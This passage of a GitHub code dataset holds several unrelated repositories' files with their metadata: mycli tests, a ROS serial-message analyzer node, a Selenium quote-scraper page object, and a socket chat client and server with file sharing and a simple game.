os.environ.pop('MYSQL_TEST_LOGIN_FILE')\n\n _, temp_path = tempfile.mkstemp()\n os.environ['MYSQL_TEST_LOGIN_FILE'] = temp_path\n\n login_cnf_path = get_mylogin_cnf_path()\n\n if original_env is not None:\n os.environ['MYSQL_TEST_LOGIN_FILE'] = original_env\n\n assert temp_path == login_cnf_path\n\n\ndef test_str_to_bool():\n \"\"\"Tests that str_to_bool function converts values correctly.\"\"\"\n\n assert str_to_bool(False) is False\n assert str_to_bool(True) is True\n assert str_to_bool('False') is False\n assert str_to_bool('True') is True\n assert str_to_bool('TRUE') is True\n assert str_to_bool('1') is True\n assert str_to_bool('0') is False\n assert str_to_bool('on') is True\n assert str_to_bool('off') is False\n assert str_to_bool('off') is False\n\n with pytest.raises(ValueError):\n str_to_bool('foo')\n\n with pytest.raises(TypeError):\n str_to_bool(None)\n" }, { "alpha_fraction": 0.7116788029670715, "alphanum_fraction": 0.7116788029670715, "avg_line_length": 21.83333396911621, "blob_id": "3856871b5247d825f13bb90a3544a522e6bb4d61", "content_id": "261bee6e1e24ebb401fa6d779ddd6c85bfafc5c1", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 274, "license_type": "permissive", "max_line_length": 72, "num_lines": 12, "path": "/test/myclirc", "repo_name": "kongzhidea/mycli", "src_encoding": "UTF-8", "text": "# vi: ft=dosini\n\n# This file is loaded after mycli/myclirc and should override only those\n# variables needed for testing.\n# To see what every variable does see mycli/myclirc\n\n[main]\n\nlog_file = ~/.mycli.test.log\nlog_level = DEBUG\nprompt = '\\t \\u@\\h:\\d> '\nless_chatty = True\n" }, { "alpha_fraction": 0.5318312048912048, "alphanum_fraction": 0.5371959805488586, "avg_line_length": 28.43157958984375, "blob_id": "cf7d1e82621b000f0fbcceb796d76685b9d1af0b", "content_id": "5dfd3800f1a77d909f86bc58524cb131f062d821", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2796, "license_type": "permissive", "max_line_length": 75, "num_lines": 95, "path": "/test/features/steps/wrappers.py", "repo_name": "kongzhidea/mycli", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8\nfrom __future__ import unicode_literals\n\nimport re\nimport pexpect\nimport sys\nimport textwrap\n\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\n\ndef expect_exact(context, expected, timeout):\n timedout = False\n try:\n context.cli.expect_exact(expected, timeout=timeout)\n except pexpect.exceptions.TIMEOUT:\n timedout = True\n if timedout:\n # Strip color codes out of the output.\n actual = re.sub(r'\\x1b\\[([0-9A-Za-z;?])+[m|K]?',\n '', context.cli.before)\n raise Exception(\n textwrap.dedent('''\\\n Expected:\n ---\n {0!r}\n ---\n Actual:\n ---\n {1!r}\n ---\n Full log:\n ---\n {2!r}\n ---\n ''').format(\n expected,\n actual,\n context.logfile.getvalue()\n )\n )\n\n\ndef expect_pager(context, expected, timeout):\n expect_exact(context, \"{0}\\r\\n{1}{0}\\r\\n\".format(\n context.conf['pager_boundary'], expected), timeout=timeout)\n\n\ndef run_cli(context, run_args=None):\n \"\"\"Run the process using pexpect.\"\"\"\n run_args = run_args or []\n if context.conf.get('host', None):\n run_args.extend(('-h', context.conf['host']))\n if context.conf.get('user', None):\n run_args.extend(('-u', context.conf['user']))\n if context.conf.get('pass', None):\n run_args.extend(('-p', context.conf['pass']))\n if 
context.conf.get('dbname', None):\n run_args.extend(('-D', context.conf['dbname']))\n if context.conf.get('defaults-file', None):\n run_args.extend(('--defaults-file', context.conf['defaults-file']))\n if context.conf.get('myclirc', None):\n run_args.extend(('--myclirc', context.conf['myclirc']))\n try:\n cli_cmd = context.conf['cli_command']\n except KeyError:\n cli_cmd = (\n '{0!s} -c \"'\n 'import coverage ; '\n 'coverage.process_startup(); '\n 'import mycli.main; '\n 'mycli.main.cli()'\n '\"'\n ).format(sys.executable)\n\n cmd_parts = [cli_cmd] + run_args\n cmd = ' '.join(cmd_parts)\n context.cli = pexpect.spawnu(cmd, cwd=context.package_root)\n context.logfile = StringIO()\n context.cli.logfile = context.logfile\n context.exit_sent = False\n context.currentdb = context.conf['dbname']\n\n\ndef wait_prompt(context):\n \"\"\"Make sure prompt is displayed.\"\"\"\n user = context.conf['user']\n host = context.conf['host']\n dbname = context.currentdb\n expect_exact(context, '{0}@{1}:{2}> '.format(\n user, host, dbname), timeout=5)\n context.atprompt = True\n" } ]
3
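The mycli tests above imply the .mylogin.cnf layout they poke at: 4 unused bytes, a 20-byte login key (the corruption test overwrites bytes 4-13), then a sequence of length-prefixed cipher chunks read with struct.unpack('<i', ...). A sketch of walking those chunks; iter_cipher_chunks is a hypothetical helper name, not part of mycli:

import struct

def iter_cipher_chunks(buf):
    buf.seek(24)                      # skip 4 unused bytes + 20-byte login key
    while True:
        len_buf = buf.read(4)
        if len(len_buf) < 4:
            return                    # end of file
        cipher_len, = struct.unpack('<i', len_buf)
        yield buf.read(cipher_len)    # one encrypted line of the option file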
topcuemre/ITU_Rover_Assignment
https://github.com/topcuemre/ITU_Rover_Assignment
663d215b34c20ad5153188d162ff17a4cedc2459
389705e4b5064d34e6364c7418565697df1a7a9e
16fbb24929d5f077c98120cf7f9d3736daea1e52
refs/heads/main
2023-07-18T16:23:48.840513
2021-09-02T20:43:40
2021-09-02T20:43:40
402,557,743
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4292546808719635, "alphanum_fraction": 0.4531686007976532, "avg_line_length": 29.585365295410156, "blob_id": "d7748bc5146804f2c5b2e1b9a771cc68bbb3a4e6", "content_id": "9212adc34fdd716eab55efce0ba56f2b0dcaeb4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2509, "license_type": "no_license", "max_line_length": 75, "num_lines": 82, "path": "/analyzer_node.py", "repo_name": "topcuemre/ITU_Rover_Assignment", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport rospy\nfrom std_msgs.msg import String\n\nn_data = String()\nstart = False\npub_drive = rospy.Publisher('/position/drive', String, queue_size = 10)\npub_arm = rospy.Publisher('/position/robotic_arm', String, queue_size = 10)\n\ndef callback(data):\n global start, n_data\n n_data = filter(data.data)\n if type(n_data) == str:\n n_data = trim(n_data)\n n_data = reader(n_data)\n rospy.loginfo(n_data)\n if (not start):\n start = True\n\ndef reader(msg):\n msg_mod = ''\n if len(msg) == 16:\n for i in range(0, 16, 4):\n if msg[i] == '0':\n # positive value: clamp the magnitude to 255\n if int(msg[ i+1 : i+4 ]) > 255:\n limit = str(255)\n msg_mod = msg_mod + '+' + limit + ' '\n else:\n msg_mod = msg_mod + '+' + msg[ i+1 : i+4 ] + ' '\n else:\n # negative value: clamp the magnitude to 255, keep the '-' sign\n if int(msg[ i+1 : i+4 ]) > 255:\n limit = str(255)\n msg_mod = msg_mod + '-' + limit + ' '\n else:\n msg_mod = msg_mod + '-' + msg[ i+1 : i+4 ] + ' '\n return msg_mod\n else:\n for i in range(0, 24, 4):\n if msg[i] == '0':\n # positive value: clamp the magnitude to 255\n if int(msg[ i+1 : i+4 ]) > 255:\n limit = str(255)\n msg_mod = msg_mod + '+' + limit + ' '\n else:\n msg_mod = msg_mod + '+' + msg[ i+1 : i+4 ] + ' '\n else:\n # negative value: clamp the magnitude to 255, keep the '-' sign\n if int(msg[ i+1 : i+4 ]) > 255:\n limit = str(255)\n msg_mod = msg_mod + '-' + limit + ' '\n else:\n msg_mod = msg_mod + '-' + msg[ i+1 : i+4 ] + ' '\n return msg_mod\n\ndef filter(msg):\n if msg.startswith('A') and msg.endswith('B'):\n return msg\n\ndef trim(msg):\n msg_repl = msg.replace('A','').replace('B','')\n return msg_repl\n\ndef timer_callback(event):\n global start, pub_drive, pub_arm, n_data\n if (start) and type(n_data) == str:\n if (len(n_data) == 20):\n pub_drive.publish(n_data)\n else:\n pub_arm.publish(n_data)\n\ndef main():\n rospy.init_node('analyzer_node')\n rospy.Subscriber('/serial/drive', String, callback)\n rospy.Subscriber('/serial/robotic_arm', String, callback)\n timer = rospy.Timer(rospy.Duration(1.), timer_callback)\n rospy.spin()\n timer.shutdown()\n\nif __name__ == '__main__':\n main()\n\n" } ]
1
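For the frame format handled by analyzer_node.py above: after trim strips the 'A'/'B' delimiters, each 4-character group is a sign digit ('0' = +, '1' = -) followed by a 3-digit magnitude, clamped to 255; a 16-character payload is a drive frame and a 24-character payload an arm frame. A worked example (the frame contents are made up for illustration, and the clamping follows the corrected reader above):

# 'A0100120002551300B' -> trim -> '0100120002551300'
# groups: 0100 -> +100, 1200 -> -200, 0255 -> +255, 1300 -> clamped to -255
print(reader('0100120002551300'))   # '+100 -200 +255 -255 ' (length 20 -> /position/drive)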
damnbhola/Browser-Automation-with-Selenium
https://github.com/damnbhola/Browser-Automation-with-Selenium
25c91d6432ce51e944c097e2bb9538e9f3e8d723
bef4b8edbe1dfc79f29462de762c13ebe656251f
646ee2a712d6bfb7868be1092de390a91fb59930
refs/heads/master
2022-05-16T20:20:36.511045
2020-04-26T06:28:35
2020-04-26T06:28:35
258,954,972
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6700043678283691, "alphanum_fraction": 0.670875072479248, "avg_line_length": 35.655738830566406, "blob_id": "ddc4cce07587ec392c557f13b1fe3ce1064c5dbd", "content_id": "a2cc466b87c357df1e92a47b285eaafd3e3a809d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2297, "license_type": "no_license", "max_line_length": 94, "num_lines": 61, "path": "/pages/quote_page.py", "repo_name": "damnbhola/Browser-Automation-with-Selenium", "src_encoding": "UTF-8", "text": "from typing import List\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom locators.quote_page_locators import QuotePageLocators\r\nfrom parsers.quote import QuoteParser\r\n# for adding wait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\n\r\n\r\nclass QuotePage:\r\n def __init__(self, browser):\r\n self.browser = browser\r\n\r\n @property\r\n def quotes(self) -> List[QuoteParser]:\r\n locator = QuotePageLocators.QUOTE\r\n quote_tags = self.browser.find_elements_by_css_selector(locator)\r\n return [QuoteParser(e) for e in quote_tags]\r\n\r\n @property\r\n def author_dropdown(self) -> Select:\r\n element = self.browser.find_element_by_css_selector(QuotePageLocators.AUTHOR_DROPDOWN)\r\n return Select(element)\r\n\r\n @property\r\n def tag_dropdown(self) -> Select:\r\n element = self.browser.find_element_by_css_selector(QuotePageLocators.TAG_DROPDOWN)\r\n return Select(element)\r\n\r\n @property\r\n def search_button(self):\r\n return self.browser.find_element_by_css_selector(QuotePageLocators.SEARCH_BUTTON)\r\n\r\n def get_available_authors(self) -> List[str]:\r\n return [option.text.strip() for option in self.author_dropdown.options]\r\n\r\n def select_author(self, author_name: str):\r\n self.author_dropdown.select_by_visible_text(author_name)\r\n\r\n def get_available_tags(self) -> List[str]:\r\n return [option.text.strip() for option in self.tag_dropdown.options]\r\n\r\n def select_tag(self, tag_name: str):\r\n self.tag_dropdown.select_by_visible_text(tag_name)\r\n\r\n def search_for_quotes(self, author: str, tag: str):\r\n self.select_author(author)\r\n WebDriverWait(self.browser, 10).until(\r\n expected_conditions.presence_of_all_elements_located(\r\n (By.CSS_SELECTOR, QuotePageLocators.TAG_DROPDOWN_VALUE_OPTION)\r\n )\r\n )\r\n try:\r\n self.select_tag(tag)\r\n except NoSuchElementException:\r\n return f\"Message: Author '{author}' does not have a tag '{tag}'.\"\r\n else:\r\n self.search_button.click()\r\n return self.quotes\r\n" }, { "alpha_fraction": 0.6691666841506958, "alphanum_fraction": 0.6691666841506958, "avg_line_length": 28, "blob_id": "6725239ad13d7d7589a2c22c0b98fc70798a7dac", "content_id": "b543345e095ebdd0212670df9fd3b0ab072e5795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1200, "license_type": "no_license", "max_line_length": 97, "num_lines": 40, "path": "/app.py", "repo_name": "damnbhola/Browser-Automation-with-Selenium", "src_encoding": "UTF-8", "text": "from selenium import webdriver\r\nfrom pages.quote_page import QuotePage, NoSuchElementException\r\n\r\ntry:\r\n author = input(\"Enter the author you'd like quotes of: \")\r\n tag = input(\"Enter the tag you want: \")\r\n\r\n chrome = webdriver.Chrome(executable_path=\"/Users/daman/Downloads/chromedriver/chromedriver\")\r\n 
chrome.get(\"http://quotes.toscrape.com/search.aspx\")\r\n page = QuotePage(chrome)\r\n print(page.search_for_quotes(author, tag))\r\nexcept NoSuchElementException as e:\r\n print(e)\r\nexcept Exception as e:\r\n print(e)\r\n print(\"An Unknown Error occurred. Please Try again later...\")\r\n\r\n'''\r\nfor quote in page.quotes:\r\n print(\"\\n\" + quote.content)\r\n print(\"- \" + quote.author)\r\n print(quote.tags)\r\n'''\r\n'''\r\nauthors = page.get_available_authors()\r\nprint(\"Select one of these authors: [{}]\".format(\" | \".join(authors)))\r\nauthor = input(\"Enter the author you'd like quotes of: \")\r\npage.select_author(author)\r\n\r\ntags = page.get_available_tags()\r\nprint(\"Select one of these tags: [{}]\".format(\" | \".join(tags)))\r\ntag = input(\"Enter the tag you want: \")\r\npage.select_tag(tag)\r\n\r\npage.search_button.click()\r\n\r\nquotes = page.quotes\r\nfor quote in quotes:\r\n print(quote)\r\n'''\r\n" } ]
2
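The QuotePage class above is a page object whose search_for_quotes blocks on an explicit wait before touching the tag dropdown. A minimal sketch of that wait idiom on its own (wait_for_options is a hypothetical helper name, not part of the repository):

from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait

def wait_for_options(browser, css_selector, timeout=10):
    # block until the dropdown is repopulated for the chosen author
    return WebDriverWait(browser, timeout).until(
        expected_conditions.presence_of_all_elements_located(
            (By.CSS_SELECTOR, css_selector)
        )
    )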
J1E1D71/ICS_Final
https://github.com/J1E1D71/ICS_Final
33a0043b336bc33cc6ad5026615d490e810fdeb3
f2b03188b946be7fca666e24861e9f0f98b1e848
f4cfee101841b7c73130211daf9b51a3595421b1
refs/heads/master
2020-03-15T04:07:44.384563
2018-05-10T07:06:40
2018-05-10T07:06:40
131,958,225
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.4498259723186493, "alphanum_fraction": 0.468097448348999, "avg_line_length": 29.214284896850586, "blob_id": "b83bb07788cbbe1525230593d2df08d70825ce1e", "content_id": "df9f6fecebb311dd5d1880953dcb64e1ebd1d729", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3448, "license_type": "no_license", "max_line_length": 94, "num_lines": 112, "path": "/player.py", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 30 18:56:08 2018\n\n@author: Lenovo\n\"\"\"\n\nclass Player:\n def __init__(self,name):\n self.name = name\n self.energy = {'wave':0,'stone':0}\n self.options = ['defense wave','wave energy +1','stone +1']\n self.choice = ''\n \n def update(self):\n\n if self.choice == 'defense wave':\n pass\n \n elif self.choice == 'wave energy +1':\n self.set_energy('wave',1)\n \n elif self.choice == 'stone +1':\n self.set_energy('stone',1)\n \n elif self.choice == 'wave 1':\n self.set_energy('wave',-1)\n \n elif self.choice == 'stone 1':\n self.set_energy('stone',-1)\n \n elif self.choice == 'wave 2':\n self.set_energy('wave',-2)\n \n elif self.choice == 'stone 2':\n self.set_energy('stone',-2)\n \n elif self.choice == 'wave 3':\n self.set_energy('wave',-3)\n \n elif self.choice == 'stone 3':\n self.set_energy('stone',-3)\n \n self.add_opition()\n \n \n def set_energy(self,kind,change):\n self.energy[kind] += change\n \n def add_opition(self):\n attack = ['stone 1','wave 1','stone 2','wave 2','stone 3','wave 3']\n for i in ['wave','stone']:\n if (self.energy[i] == 1) and (str(i+' 1') not in self.options):\n self.options.append(str(i+' 1')) \n \n elif (self.energy[i] == 2) and ( str(i+' 2') not in self.options):\n self.options.append(str(i+' 2')) \n \n elif (self.energy[i] == 3) and (str(i+' 3') not in self.options):\n self.options.append(str(i+' 3')) \n for i in self.options:\n if i in attack:\n try:\n value = int(i[-1])\n except:\n value = 1\n if value > self.energy[i[:5].strip()]:\n self.options.remove(i)\n \n \n def set_choice(self,num):\n self.choice = self.options[num]\n \n \n def get_option(self):\n return self.options\n \n def clear_choice(self):\n self.choice = ''\n \n def fight(self,enemy):\n non_attack = ['defense wave','wave energy +1','stone +1']\n attack = ['stone 1','wave 1','stone 2','wave 2','stone 3','wave 3']\n if self.choice == enemy.choice:\n return 'tie'\n \n elif (self.choice in non_attack) and (enemy.choice in non_attack):\n return 'tie'\n \n elif self.choice == 'defense wave':\n return 'tie' if enemy.choice == 'wave' else False\n\n elif (self.choice in attack) and (enemy.choice in attack):\n return True if (attack.index(self.choice) > attack.index(enemy.choice)) else False\n\n elif self.choice == 'wave' and enemy.choice == 'defense wave':\n return 'tie' \n \n elif enemy.choice[:5] == 'stone' and self.choice == 'stone +1':\n if (int(enemy.choice[-1]) - 1) <= self.energy['stone']:\n return 'tie'\n else:\n return False\n\n elif (self.choice in attack) and (enemy.choice in non_attack):\n return True\n \n else:\n return False\n\na = Player('new')\nb = Player('old') \n \n \n \n \n \n \n" }, { "alpha_fraction": 0.38555431365966797, "alphanum_fraction": 0.3915061056613922, "avg_line_length": 41.182979583740234, "blob_id": "8a48a7e8ed5ad65611cb02f1d3182db08a42576c", "content_id": "dcc0ede52d18de6ff3e0e346ea9c4e5f70c35268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9913, 
"license_type": "no_license", "max_line_length": 165, "num_lines": 235, "path": "/client_state_machine.py", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "\"\"\"\nCreated on Sun Apr 5 00:00:32 2015\n\n@author: zhengzhang\n\"\"\"\n\"\"\"\nCreated on Sun Apr 5 00:00:32 2015\n\n@author: zhengzhang\n\"\"\"\nfrom chat_utils import *\nimport json\nimport os\nimport base64\n\nclass ClientSM:\n def __init__(self, s):\n self.state = S_OFFLINE\n self.peer = ''\n self.me = ''\n self.out_msg = ''\n self.s = s\n\n def set_state(self, state):\n self.state = state\n\n def get_state(self):\n return self.state\n\n def set_myname(self, name):\n self.me = name\n\n def get_myname(self):\n return self.me\n\n def connect_to(self, peer):\n msg = json.dumps({\"action\":\"connect\", \"target\":peer})\n mysend(self.s, msg)\n response = json.loads(myrecv(self.s))\n if response[\"status\"] == \"success\":\n self.peer = peer\n self.out_msg += 'You are connected with '+ self.peer + '\\n'\n return (True)\n elif response[\"status\"] == \"busy\":\n self.out_msg += 'User is busy. Please try again later\\n'\n elif response[\"status\"] == \"self\":\n self.out_msg += 'Cannot talk to yourself (sick)\\n'\n else:\n self.out_msg += 'User is not online, try again later\\n'\n return(False)\n\n def disconnect(self):\n msg = json.dumps({\"action\":\"disconnect\"})\n mysend(self.s, msg)\n self.out_msg += 'You are disconnected from ' + self.peer + '\\n'\n self.peer = ''\n\n def proc(self, my_msg, peer_msg):\n self.out_msg = ''\n#==============================================================================\n# Once logged in, do a few things: get peer listing, connect, search\n# And, of course, if you are so bored, just go\n# This is event handling instate \"S_LOGGEDIN\"\n#==============================================================================\n if self.state == S_LOGGEDIN:\n # todo: can't deal with multiple lines yet\n if len(my_msg) > 0:\n\n if my_msg == 'q':\n self.out_msg += 'See you next time!\\n'\n self.state = S_OFFLINE\n\n elif my_msg == 'time':\n mysend(self.s, json.dumps({\"action\":\"time\"}))\n time_in = json.loads(myrecv(self.s))[\"results\"]\n self.out_msg += \"Time is: \" + time_in\n\n elif my_msg == 'who':\n mysend(self.s, json.dumps({\"action\":\"list\"}))\n logged_in = json.loads(myrecv(self.s))[\"results\"]\n self.out_msg += 'Here are all the users in the system:\\n'\n self.out_msg += logged_in\n\n elif my_msg[0] == 'c':\n peer = my_msg[1:]\n peer = peer.strip()\n if self.connect_to(peer) == True:\n self.state = S_CHATTING\n self.out_msg += 'Connect to ' + peer + '. 
Chat away!\\n\\n'\n self.out_msg += '-----------------------------------\\n'\n else:\n self.out_msg += 'Connection unsuccessful\\n'\n\n elif my_msg[0] == '?':\n term = my_msg[1:].strip()\n mysend(self.s, json.dumps({\"action\":\"search\", \"target\":term}))\n search_rslt = json.loads(myrecv(self.s))[\"results\"][1:].strip()\n if (len(search_rslt)) > 0:\n self.out_msg += search_rslt + '\\n\\n'\n else:\n self.out_msg += '\\'' + term + '\\'' + ' not found\\n\\n'\n\n elif my_msg[0] == 'p' and my_msg[1:].isdigit():\n poem_idx = my_msg[1:].strip()\n mysend(self.s, json.dumps({\"action\":\"poem\", \"target\":poem_idx}))\n poem = json.loads(myrecv(self.s))[\"results\"][1:].strip()\n if (len(poem) > 0):\n self.out_msg += poem + '\\n\\n'\n else:\n self.out_msg += 'Sonnet ' + poem_idx + ' not found\\n\\n'\n elif my_msg [:12]==\"write a poem\":\n mysend(self.s,json.dumps({\"action\":\"write\"}))\n sentence = json.loads(myrecv(self.s))[\"results\"].strip()\n self.out_msg += sentence\n\n else:\n self.out_msg += menu\n\n if len(peer_msg) > 0:\n peer_msg = json.loads(peer_msg)\n if peer_msg[\"action\"] == \"connect\":\n self.peer = peer_msg[\"from\"]\n self.out_msg += 'Request from ' + self.peer + '\\n'\n self.out_msg += 'You are connected with ' + self.peer\n self.out_msg += '. Chat away!\\n\\n'\n self.out_msg += '------------------------------------\\n'\n self.state = S_CHATTING\n\n#==============================================================================\n# Start chatting, 'bye' for quit\n# This is event handling instate \"S_CHATTING\"\n#==============================================================================\n elif self.state == S_CHATTING:\n if len(my_msg) > 0: # my stuff going out\n mysend(self.s, json.dumps({\"action\":\"exchange\", \"from\":\"[\" + self.me + \"]\", \"message\":my_msg}))\n if my_msg == 'bye':\n self.disconnect()\n self.state = S_LOGGEDIN\n self.peer = ''\n elif my_msg[:10] == 'send file:':\n file_name = my_msg[10:]\n if os.path.isfile(file_name):\n with open(file_name, 'rb') as f:\n data = base64.b64encode(f.read())\n data = data.decode('utf-8')\n self.out_msg += 'file read'\n try:\n \n mysend(self.s,json.dumps({\"action\":\"file exchange\", \"from\":\"[\" + self.me + \"]\", \"file\":data,'message':'You should check the new file.'}))\n self.out_msg += 'file sent'\n except:\n self.out_msg += 'no such file'\n elif my_msg == \"let's play a game\":\n mysend(self.s,json.dumps({\"action\":\"game\", \"from\":\"[\" + self.me + \"]\",\"connect\":False}))\n self.out_msg += 'waiting for response......'\n \n if len(peer_msg) > 0: # peer's stuff, coming in\n peer_msg = json.loads(peer_msg)\n if peer_msg[\"action\"] == \"connect\":\n self.out_msg += \"(\" + peer_msg[\"from\"] + \" joined)\\n\"\n elif peer_msg[\"action\"] == \"disconnect\":\n self.state = S_LOGGEDIN\n elif peer_msg['action'] == 'file exchange':\n save_path = r\"C:\\Users\\Lenovo\\desktop\"\n data = peer_msg['file']\n data = bytes(data,encoding = 'utf-8')\n try:\n with open('pic_received.jpg', 'wb') as f:\n data = base64.b64decode(data)\n f.write(data)\n self.out_msg += 'you got a file from' + peer_msg['from']\n except:\n self.out_msg += 'can not write'\n elif peer_msg['action'] == 'game':\n if peer_msg['connect'] == False:\n self.out_msg += peer_msg['message']\n else:\n try:\n self.out_msg += peer_msg['message']\n mysend(self.s,json.dumps({'action':'game','connect':True}))\n self.out_msg += 'changing state'\n self.state = S_GAME\n except:\n self.out_msg += 'something wrong 1'\n else:\n self.out_msg += 
peer_msg[\"from\"] + peer_msg[\"message\"]\n\n\n # Display the menu again\n if self.state == S_LOGGEDIN:\n self.out_msg += menu\n \n# =============================================================================\n# GAME STATE! \n# =============================================================================\n elif self.state == S_GAME:\n try:\n if len(peer_msg) > 0:\n print('got message')\n peer_msg = json.loads(peer_msg)\n# print(peer_msg)\n if peer_msg['connect'] == True:\n msg = peer_msg['message']\n self.out_msg += msg + '\\n'\n if 'options' in peer_msg:\n options = peer_msg['options']\n for i in range(len(options)):\n self.out_msg += str(i) + ':' + options[i] + '\\t'\n else:\n result = peer_msg ['message']\n self.out_msg += result\n self.state = S_CHATTING\n \n if len(my_msg) > 0 :\n mysend(self.s,json.dumps({'action':'game','connect':True, 'choice':int(my_msg)}))\n self.out_msg += 'message sent, choice is ' + str(my_msg)\n except:\n self.out_msg += 'something wrong 2'\n \n \n \n \n \n \n \n \n \n#==============================================================================\n# invalid state\n#==============================================================================\n else:\n self.out_msg += 'How did you wind up here??\\n'\n print_state(self.state)\n\n return self.out_msg\n" }, { "alpha_fraction": 0.406261682510376, "alphanum_fraction": 0.40975427627563477, "avg_line_length": 51.563934326171875, "blob_id": "b8c38364f31a20db9f6d50cc92edf8afaaea9165", "content_id": "18cfd4bfb8ff411d64745a8a99bf92903358aef4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16034, "license_type": "no_license", "max_line_length": 174, "num_lines": 305, "path": "/chat_server.py", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "\"\"\"\nCreated on Tue Jul 22 00:47:05 2014\n\n@author: alina, zzhang\n\"\"\"\n\nimport time\nimport socket\nimport select\nimport sys\nimport string\nimport indexer\nimport json\nimport pickle as pkl\nfrom chat_utils import *\nimport chat_group as grp\nimport player\nimport generator\n\nclass Server:\n def __init__(self):\n self.new_clients = [] #list of new sockets of which the user id is not known\n self.logged_name2sock = {} #dictionary mapping username to socket\n self.logged_sock2name = {} # dict mapping socket to user name\n self.all_sockets = []\n self.group = grp.Group()\n #start server\n self.server=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server.bind(SERVER)\n self.server.listen(5)\n self.all_sockets.append(self.server)\n #initialize past chat indices\n self.indices={}\n # sonnet\n self.sonnet_f = open('AllSonnets.txt.idx', 'rb')\n self.sonnet = pkl.load(self.sonnet_f)\n self.sonnet_f.close()\n self.players = {}\n def new_client(self, sock):\n #add to all sockets and to new clients\n print('new client...')\n sock.setblocking(0)\n self.new_clients.append(sock)\n self.all_sockets.append(sock)\n\n def login(self, sock):\n #read the msg that should have login code plus username\n try:\n msg = json.loads(myrecv(sock))\n if len(msg) > 0:\n\n if msg[\"action\"] == \"login\":\n name = msg[\"name\"]\n if self.group.is_member(name) != True:\n #move socket from new clients list to logged clients\n self.new_clients.remove(sock)\n #add into the name to sock mapping\n self.logged_name2sock[name] = sock\n self.logged_sock2name[sock] = name\n #load chat history of that user\n if name not in self.indices.keys():\n try:\n self.indices[name]=pkl.load(open(name+'.idx','rb'))\n except IOError: 
#chat index does not exist, then create one\n self.indices[name] = indexer.Index(name)\n print(name + ' logged in')\n self.group.join(name)\n mysend(sock, json.dumps({\"action\":\"login\", \"status\":\"ok\"}))\n else: #a client under this name has already logged in\n mysend(sock, json.dumps({\"action\":\"login\", \"status\":\"duplicate\"}))\n print(name + ' duplicate login attempt')\n else:\n print ('wrong code received')\n else: #client died unexpectedly\n self.logout(sock)\n except:\n self.all_sockets.remove(sock)\n\n def logout(self, sock):\n #remove sock from all lists\n name = self.logged_sock2name[sock]\n pkl.dump(self.indices[name], open(name + '.idx','wb'))\n del self.indices[name]\n del self.logged_name2sock[name]\n del self.logged_sock2name[sock]\n self.all_sockets.remove(sock)\n self.group.leave(name)\n sock.close()\n\n#==============================================================================\n# main command switchboard\n#==============================================================================\n def handle_msg(self, from_sock):\n #read msg code\n msg = myrecv(from_sock)\n if len(msg) > 0:\n#==============================================================================\n# handle connect request\n#==============================================================================\n msg = json.loads(msg)\n if msg[\"action\"] == \"connect\":\n to_name = msg[\"target\"]\n from_name = self.logged_sock2name[from_sock]\n if to_name == from_name:\n msg = json.dumps({\"action\":\"connect\", \"status\":\"self\"})\n # connect to the peer\n elif self.group.is_member(to_name):\n to_sock = self.logged_name2sock[to_name]\n self.group.connect(from_name, to_name)\n the_guys = self.group.list_me(from_name)\n msg = json.dumps({\"action\":\"connect\", \"status\":\"success\"})\n for g in the_guys[1:]:\n to_sock = self.logged_name2sock[g]\n mysend(to_sock, json.dumps({\"action\":\"connect\", \"status\":\"request\", \"from\":from_name}))\n else:\n msg = json.dumps({\"action\":\"connect\", \"status\":\"no-user\"})\n mysend(from_sock, msg)\n#==============================================================================\n# handle messeage exchange: one peer for now. 
will need multicast later\n#==============================================================================\n elif msg[\"action\"] == \"exchange\":\n from_name = self.logged_sock2name[from_sock]\n the_guys = self.group.list_me(from_name)\n #said = msg[\"from\"]+msg[\"message\"]\n said2 = text_proc(msg[\"message\"], from_name)\n self.indices[from_name].add_msg_and_index(said2)\n for g in the_guys[1:]:\n to_sock = self.logged_name2sock[g]\n self.indices[g].add_msg_and_index(said2)\n mysend(to_sock, json.dumps({\"action\":\"exchange\", \"from\":msg[\"from\"], \"message\":msg[\"message\"]}))\n#==============================================================================\n# listing available peers\n#==============================================================================\n elif msg[\"action\"] == \"list\":\n from_name = self.logged_sock2name[from_sock]\n msg = self.group.list_all(from_name)\n mysend(from_sock, json.dumps({\"action\":\"list\", \"results\":msg}))\n#==============================================================================\n# retrieve a sonnet\n#==============================================================================\n elif msg[\"action\"] == \"poem\":\n poem_indx = int(msg[\"target\"])\n from_name = self.logged_sock2name[from_sock]\n print(from_name + ' asks for ', poem_indx)\n poem = self.sonnet.get_sect(poem_indx)\n print('here:\\n', poem)\n mysend(from_sock, json.dumps({\"action\":\"poem\", \"results\":poem}))\n#==============================================================================\n# time\n#==============================================================================\n elif msg[\"action\"] == \"time\":\n ctime = time.strftime('%d.%m.%y,%H:%M', time.localtime())\n mysend(from_sock, json.dumps({\"action\":\"time\", \"results\":ctime}))\n#==============================================================================\n# search\n#==============================================================================\n elif msg[\"action\"] == 